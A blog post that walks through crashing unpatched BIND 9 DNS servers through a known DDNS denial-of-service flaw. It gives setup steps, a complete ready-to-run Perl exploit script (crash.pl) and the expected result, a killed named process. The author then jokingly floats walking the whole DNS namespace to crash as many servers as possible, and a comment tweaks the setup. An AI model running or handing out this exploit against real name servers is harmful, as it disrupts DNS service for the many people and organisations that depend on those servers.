How to crash a DNS server

I had a spare hour this evening, so thought I would have a play with a Perl script I found that exploits the CERT vulnerability announced a few months ago (CERT VU#725188 BIND 9 vulnerable to DoS via DDNS).

Sure enough, any name server that has not yet been patched and is configured with the 127.0.0.1 PTR loopback record (which should be all of them!) can be crashed. Here’s how…

Download, compile and install the following Perl modules in this order:

Digest::MD5
Digest::SHA1
Digest::HMAC
Net::IP
Net::DNS

Copy the following code and call it crash.pl…

#!/usr/bin/perl -w
use Net::DNS;
our $NSI = ‘192.168.10.249’;
my $rzone = "0.0.127.in-addr.arpa";
my $rptr  = "1.$rzone";
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
    pre => Net::DNS::RR->new(
        Name  => $rptr,
        Class => ‘IN’,
        Type  => ‘ANY’,
        TTL   => 0,
    )
);
$packet->push(
    update => Net::DNS::RR->new(
        Name  => $rptr,
        Class => ‘ANY’,
        Type  => ‘ANY’,
    )
);
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

Change the IP address in the line “our $NSI” to contain the IP address of your name server.

Now type perl crash.pl, you should see the output of a DNS update and it’ll hang. Ctrl/C, do a ps -ef|grep named and you should see the named process has gone. Check syslog and you should see an assertion failure – oops! Of course if BIND has been patched then everything should be fine. But I bet there’s loads of people who haven’t patched. And I don’t think this vuln got anywhere near as much publicity as the Kaminsky vuln published in 2008. It would be quite trivial to walk the DNS name space and send updates of this nature to all the NS records. I wonder how many name servers would crash? 😉

Maybe when I have another spare hour… <evil grin> 😉

Advertisements
This entry was posted in Computers and Internet. Bookmark the permalink.

One Response to How to crash a DNS server

  1. Paul says:

    Not sure if you need the digest modules actually. The original bit of code used TSIG to authenticate the update but I took that out, meaning you may not need to make the digest modules after all.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s